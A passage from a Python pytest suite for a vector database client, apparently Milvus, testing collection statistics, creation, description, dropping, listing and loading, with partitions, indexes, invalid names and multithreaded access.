expected: the count is equal to the length of entities
"""
raw_vectors, entities = gen_binary_entities(insert_count)
connect.insert(binary_collection, entities)
collection_list = []
collection_num = 20
for i in range(collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
connect.insert(collection_name, entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == insert_count
connect.drop_collection(collection_list[i])
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_mix(self, connect):
"""
target: test collection rows_count is correct or not with multiple collections of JACCARD
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
collection_list = []
collection_num = 20
for i in range(0, int(collection_num / 2)):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
for i in range(int(collection_num / 2), collection_num):
collection_name = gen_unique_str(uid_count)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_binary_fields)
res = connect.insert(collection_name, cons.default_binary_entities)
connect.flush(collection_list)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
connect.drop_collection(collection_list[i])
class TestGetCollectionStats:
"""
******************************************************************
The following cases are used to test `collection_stats` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("CPU not support index_type: ivf_sq8h")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=[
1,
1000,
2001
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_name_not_existed(self, connect, collection):
"""
target: get collection stats where collection name does not exist
method: call collection_stats with a random collection_name, which is not in db
expected: status not ok
"""
collection_name = gen_unique_str(uid_stats)
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_name_invalid(self, connect, get_invalid_collection_name):
"""
target: get collection stats where collection name is invalid
method: call collection_stats with invalid collection_name
expected: status not ok
"""
collection_name = get_invalid_collection_name
with pytest.raises(Exception) as e:
connect.get_collection_stats(collection_name)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_empty(self, connect, collection):
"""
target: get collection stats where no entity in collection
method: call collection_stats in empty collection
expected: segment = []
"""
stats = connect.get_collection_stats(collection)
connect.flush([collection])
assert stats[row_count] == 0
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_without_connection(self, collection, dis_connect):
"""
target: test count_entities, without connection
method: calling count_entities with correct params, with a disconnected instance
expected: count_entities raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.get_collection_stats(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_batch(self, connect, collection):
"""
target: get row count with collection_stats
method: add entities, check count in collection info
expected: count as expected
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert int(stats[row_count]) == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_single(self, connect, collection):
"""
target: get row count with collection_stats
method: add entity one by one, check count in collection info
expected: count as expected
"""
nb = 10
for i in range(nb):
connect.insert(collection, cons.default_entity)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_delete(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = [ids[0], ids[-1]]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb - 2
assert stats["partitions"][0]["row_count"] == default_nb - 2
assert stats["partitions"][0]["segments"][0]["data_size"] > 0
# TODO: enable
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_parts(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete entities, and compact collection, check count in collection info
expected: status ok, count as expected
"""
delete_length = 1000
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:delete_length]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
assert stats["row_count"] == default_nb - delete_length
compact_before = stats["partitions"][0]["segments"][0]["data_size"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_after = stats["partitions"][0]["segments"][0]["data_size"]
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def _test_get_collection_stats_after_compact_delete_one(self, connect, collection):
"""
target: get row count with collection_stats
method: add and delete one entity, and compact collection, check count in collection info
expected: status ok, count as expected
"""
ids = connect.insert(collection, cons.default_entities)
status = connect.flush([collection])
delete_ids = ids[:1]
connect.delete_entity_by_id(collection, delete_ids)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_before = stats["partitions"][0]["row_count"]
connect.compact(collection)
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
compact_after = stats["partitions"][0]["row_count"]
# pdb.set_trace()
assert compact_before == compact_after
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partition(self, connect, collection):
"""
target: get partition info in a collection
method: call collection_stats after partition created and check partition_stats
expected: status ok, vectors added to partition
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions(self, connect, collection):
"""
target: get partition info in a collection
method: create two partitions, add vectors in one of the partitions, call collection_stats and check
expected: status ok, vectors added to one partition but not the other
"""
new_tag = "new_tag"
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
connect.insert(collection, cons.default_entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 2
connect.insert(collection, cons.default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb * 3
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_A(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_B(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_partitions_C(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of vectors
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities)
connect.insert(collection, entities, partition_name=default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_partitions_D(self, connect, collection, insert_count):
"""
target: test collection rows_count is correct or not
method: create collection, create partitions and add entities in one of the partitions,
assert the value returned by count_entities method is equal to length of entities
expected: the collection count is equal to the length of entities
"""
new_tag = "new_tag"
entities = gen_entities(insert_count)
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
connect.insert(collection, entities, partition_name=default_tag)
connect.insert(collection, entities, partition_name=new_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == insert_count * 2
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_index_created(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_ip(self, connect, collection, get_simple_index):
"""
target: test collection info after index created
method: create collection, add vectors, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
get_simple_index["metric_type"] = "IP"
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
get_simple_index.update({"metric_type": "IP"})
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO: assert metric type in stats response
@pytest.mark.tags(CaseLabel.L2)
def test_get_collection_stats_after_index_created_jac(self, connect, binary_collection, get_jaccard_index):
"""
target: test collection info after index created
method: create collection, add binary entities, create index and call collection_stats
expected: status ok, index created and shown in segments
"""
ids = connect.insert(binary_collection, cons.default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, default_binary_vec_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_get_collection_stats_after_create_different_index(self, connect, collection):
"""
target: test collection info after index created repeatedly
method: create collection, add vectors, create index and call collection_stats multiple times
expected: status ok, index info shown in segments
"""
result = connect.insert(collection, cons.default_entities)
connect.flush([collection])
for index_type in ["IVF_FLAT", "IVF_SQ8"]:
connect.create_index(collection, default_float_vec_field_name,
{"index_type": index_type, "params": {"nlist": 1024}, "metric_type": "L2"})
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_collection_count_multi_collections_indexed(self, connect):
"""
target: test collection rows_count is correct or not with multiple collections of L2
method: create collection and add entities in it,
assert the value returned by count_entities method is equal to length of entities
expected: row count in segments
"""
collection_list = []
collection_num = 10
for i in range(collection_num):
collection_name = gen_unique_str(uid_stats)
collection_list.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
res = connect.insert(collection_name, cons.default_entities)
connect.flush(collection_list)
index_1 = {"index_type": "IVF_SQ8", "params": {"nlist": 1024}, "metric_type": "L2"}
index_2 = {"index_type": "IVF_FLAT", "params": {"nlist": 1024}, "metric_type": "L2"}
if i % 2:
connect.create_index(collection_name, default_float_vec_field_name, index_1)
else:
connect.create_index(collection_name, default_float_vec_field_name, index_2)
for i in range(collection_num):
stats = connect.get_collection_stats(collection_list[i])
assert stats[row_count] == default_nb
index = connect.describe_index(collection_list[i], "")
if i % 2:
create_target_index(index_1, default_float_vec_field_name)
assert index == index_1
else:
create_target_index(index_2, default_float_vec_field_name)
assert index == index_2
# break
connect.drop_collection(collection_list[i])
class TestCreateCollection:
"""
******************************************************************
The following cases are used to test `create_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_segment_row_limits()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_segment_row_limit(self, connect, get_segment_row_limit):
"""
target: test create normal collection with different fields
method: create collection with diff segment_row_limit
expected: no exception raised
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
# fields["segment_row_limit"] = get_segment_row_limit
connect.create_collection(collection_name, fields)
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L0)
def test_create_collection_after_insert(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
# pdb.set_trace()
connect.insert(collection, cons.default_entity)
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Create collection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L0)
def test_create_collection_after_insert_flush(self, connect, collection):
"""
target: test insert vector, then create collection again
method: insert vector and create collection
expected: error raised
"""
connect.insert(collection, cons.default_entity)
connect.flush([collection])
try:
connect.create_collection(collection, cons.default_fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "Create collection failed: meta table add collection failed," \
"error = collection %s exist" % collection
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_multithread(self, connect):
"""
target: test create collection with multithread
method: create collection using multithread,
expected: collections are created
"""
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid_create)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert item in connect.list_collections()
connect.drop_collection(item)
class TestCreateCollectionInvalid(object):
"""
Test creating collections with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_metric_types()
)
def get_metric_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_segment_row_limit(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_dim(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_string(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_field_types()
)
def get_field_type(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_with_invalid_segment_row_limit(self, connect, get_segment_row_limit):
collection_name = gen_unique_str()
fields = copy.deepcopy(cons.default_fields)
fields["segment_row_limit"] = get_segment_row_limit
with pytest.raises(Exception) as e:
connect.create_collection(collection_name, fields)
@pytest.mark.tags(CaseLabel.L2)
def _test_create_collection_no_segment_row_limit(self, connect):
"""
target: test create collection with no segment_row_limit params
method: create collection with correct params
expected: use default default_segment_row_limit
"""
collection_name = gen_unique_str(uid_create)
fields = copy.deepcopy(cons.default_fields)
fields.pop("segment_row_limit")
connect.create_collection(collection_name, fields)
res = connect.get_collection_info(collection_name)
logging.getLogger().info(res)
assert res["segment_row_limit"] == default_server_segment_row_limit
# TODO: assert exception
@pytest.mark.tags(CaseLabel.L2)
def test_create_collection_limit_fields(self, connect):
"""
target: test create collection with maximum fields
method: create collection with maximum field number
expected: raise exception
"""
collection_name = gen_unique_str(uid_create)
limit_num = 64
fields = copy.deepcopy(cons.default_fields)
for i in range(limit_num):
field_name = gen_unique_str("field_name")
field = {"name": field_name, "type": DataType.INT64}
fields["fields"].append(field)
try:
connect.create_collection(collection_name, fields)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "maximum field's number should be limited to 64"
class TestDescribeCollection:
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
"""
******************************************************************
The following cases are used to test `describe_collection` function, no data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_collection_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_after_index_created(self, connect, collection, get_simple_index):
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
assert index["index_type"] == get_simple_index["index_type"]
assert index["metric_type"] == get_simple_index["metric_type"]
assert index["params"] == get_simple_index["params"]
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_without_connection(self, collection, dis_connect):
"""
target: test get collection info, without connection
method: calling get collection info with correct params, with a disconnected instance
expected: get collection info raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.describe_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_not_existed(self, connect):
"""
target: test if collection not created
method: random a collection name, create this collection then drop it,
assert the value returned by describe_collection method
expected: False
"""
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
connect.describe_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.describe_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_multithread(self, connect):
"""
target: test create collection with multithread
method: create collection using multithread,
expected: collections are created
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
def get_info():
connect.describe_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=get_info)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
"""
******************************************************************
The following cases are used to test `describe_collection` function, and insert data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_fields_after_insert(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
entities = gen_entities_by_fields(fields["fields"], default_nb, vector_field["params"]["dim"])
res_ids = connect.insert(collection_name, entities)
connect.flush([collection_name])
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
class TestDescribeCollectionInvalid(object):
"""
Test describe collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test describe collection which name invalid
method: call describe_collection with invalid names
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_describe_collection_with_empty_or_None_collection_name(self, connect, collection_name):
"""
target: test describe collection which name is empty or None
method: call describe_collection with '' or None name
expected: raise exception
"""
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
class TestDropCollection:
"""
******************************************************************
The following cases are used to test `drop_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_A(self, connect, collection):
"""
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
"""
connect.drop_collection(collection)
time.sleep(2)
assert not connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_without_connection(self, collection, dis_connect):
"""
target: test describe collection, without connection
method: drop collection with correct params, with a disconnected instance
expected: drop raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_not_existed(self, connect):
"""
target: test if collection not created
method: random a collection name, which not existed in db,
assert the exception raised returned by drp_collection method
expected: False
"""
collection_name = gen_unique_str(uid_drop)
try:
connect.drop_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_collection_multithread(self, connect):
"""
target: test create and drop collection with multithread
method: create and drop collection using multithread,
expected: collections are created, and dropped
"""
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid_drop)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.drop_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert not connect.has_collection(item)
class TestDropCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test drop invalid collection
method: drop collection with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_drop_collection_with_empty_or_None_collection_name(self, connect, collection_name):
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
class TestHasCollection:
"""
******************************************************************
The following cases are used to test `has_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_without_connection(self, collection, dis_connect):
"""
target: test has collection, without connection
method: calling has collection with correct params, with a disconnected instance
expected: has collection raise exception
"""
with pytest.raises(Exception) as e:
assert dis_connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_has_collection_not_existed(self, connect):
"""
target: test if collection not created
method: random a collection name, create this collection then drop it,
assert the value returned by has_collection method
expected: False
"""
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
assert connect.has_collection(collection_name)
connect.drop_collection(collection_name)
assert not connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_multithread(self, connect):
"""
target: test create collection with multithread
method: create collection using multithread,
expected: collections are created
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
def has():
assert connect.has_collection(collection_name)
# assert not assert_collection(connect, collection_name)
for i in range(threads_num):
t = MyThread(target=has, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestHasCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test list collections with invalid scenario
method: show collection with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_empty_collection_name(self, connect):
"""
target: test list collections with invalid scenario
method: show collection with empty collection name
expected: raise exception
"""
collection_name = ''
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_none_collection_name(self, connect):
"""
target: test list collections with invalid scenario
method: show collection with no collection name
expected: raise exception
"""
collection_name = None
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
class TestListCollections:
"""
******************************************************************
The following cases are used to test `list_collections` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_collections_multi_collections(self, connect):
"""
target: test list collections
method: create collection, assert the value returned by list_collections method
expected: True
"""
collection_num = 50
collection_names = []
for i in range(collection_num):
collection_name = gen_unique_str(uid_list)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
assert collection_name in connect.list_collections()
for i in range(collection_num):
connect.drop_collection(collection_names[i])
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_without_connection(self, dis_connect):
"""
target: test list collections, without connection
method: calling list collections with correct params, with a disconnected instance
expected: list collections raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.list_collections()
# TODO: make sure to run this case in the end
@pytest.mark.skip("r0.3-test")
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_no_collection(self, connect):
"""
target: test show collections is correct or not, if no collection in db
method: delete all collections,
assert the value returned by list_collections method is equal to []
expected: the status is ok, and the result is equal to []
"""
result = connect.list_collections()
if result:
for collection_name in result:
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_multithread(self, connect):
"""
target: test list collection with multithread
method: list collection using multithread,
expected: list collections correctly
"""
threads_num = 10
threads = []
collection_name = gen_unique_str(uid_list)
connect.create_collection(collection_name, cons.default_fields)
def _list():
assert collection_name in connect.list_collections()
for i in range(threads_num):
t = MyThread(target=_list)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestLoadCollection:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_index(self, connect, collection, get_simple_index):
"""
target: test load collection, after index created
method: insert and create index, load collection with correct params
expected: no error raised
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
result = connect.insert(binary_collection, cons.default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
get_binary_index["metric_type"] = metric_type
connect.drop_index(binary_collection, default_binary_vec_field_name)
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, default_binary_vec_field_name)
assert index == get_binary_index
connect.load_collection(binary_collection)
connect.release_collection(binary_collection)
@pytest.mark.tags(CaseLabel.L0)
def test_load_empty_collection(self, connect, collection):
"""
target: test load collection
method: no entities in collection, load collection with correct params
expected: load success
"""
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self, dis_connect, collection):
"""
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_dis_connect(self, dis_connect, collection):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_not_existed(self, connect, collection):
"""
target: test load invalid collection
method: load not existed collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_not_existed(self, connect, collection):
"""
target: test release a not existed collection
method: release with a not existed collection anme
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.release_collection(collection_name)
except Exception as e:
